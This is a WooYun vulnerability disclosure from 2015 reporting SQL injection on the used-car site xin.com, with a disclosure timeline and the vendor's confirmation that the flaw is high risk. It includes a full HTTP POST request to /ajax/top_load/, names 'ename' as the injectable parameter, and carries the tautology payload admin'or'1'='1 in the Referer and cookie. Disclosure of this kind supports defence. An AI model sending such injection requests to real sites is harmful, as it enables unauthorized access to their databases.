当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0142401
漏洞标题:
优信二手车主站SQL注入
相关厂商:
xin.com
漏洞作者:
需求又改了
提交时间:
2015-10-23 20:18
修复时间:
2015-12-10 12:34
公开时间:
2015-12-10 12:34
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

小锤抠缝

详细说明:

POST /ajax/top_load/ HTTP/1.1
Host: www.xin.com
Proxy-Connection: keep-alive
Content-Length: 27
Accept: */*
Origin: http://www.xin.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://www.xin.com/guangzhou/s/?q=admin%27or%271%27=%271
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=rBBkh1X9sWUleVOeChOvAg==; sto-id-20480=IHGEBAKMFAAA; _smt_uid=55fdb16a.1f796cdb; Hm_lvt_ae57612a280420ca44598b857c8a9712=1442689392; Hm_lpvt_ae57612a280420ca44598b857c8a9712=1442738014; XIN_LOCATION_CITY=%7B%22cityid%22%3A%22501%22%2C%22areaid%22%3A%227%22%2C%22big_areaid%22%3A%221%22%2C%22provinceid%22%3A%225%22%2C%22cityname%22%3A%22%5Cu5e7f%5Cu5dde%22%2C%22ename%22%3A%22guangzhou%22%2C%22shortname%22%3A%22GZ%22%2C%22service%22%3A%221%22%2C%22near%22%3A%22502%2C503%2C504%2C505%2C518%22%7D; XIN_SUGGEST_HISTORY_ADD=%7B%22label%22%3A%20%22admin'or'1'%3D'1%22%2C%22num%22%3A%20%22-1%22%2C%22query%22%3A%20%22%2Fs%2F%3Fq%3Dadmin'or'1'%3D'1%22%2C%22value%22%3A%20%22admin'or'1'%3D'1%22%7D; RT=sl=2&ss=1442689379807&tt=4515&obo=0&bcn=%2F%2F36f1f08e.mpstat.us%2F&sh=1442738014762%3D2%3A0%3A4515%2C1442738011511%3D1%3A0%3A3245&dm=xin.com&si=30c2a751-9faa-49a0-b18b-f120eed6ac10; CNZZDATA1254778416=1751243712-1442685657-http%253A%252F%252Fwww.xin.com%252F%7C1442734258
ename=guangzhou


注入参数:ename

11.png

漏洞证明:

11.png

修复方案:

结合业务做修复,你们更专业

版权声明:转载请注明来源 需求又改了@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-26 12:32

厂商回复:

谢谢反馈!漏洞正在修复中。

最新状态:

暂无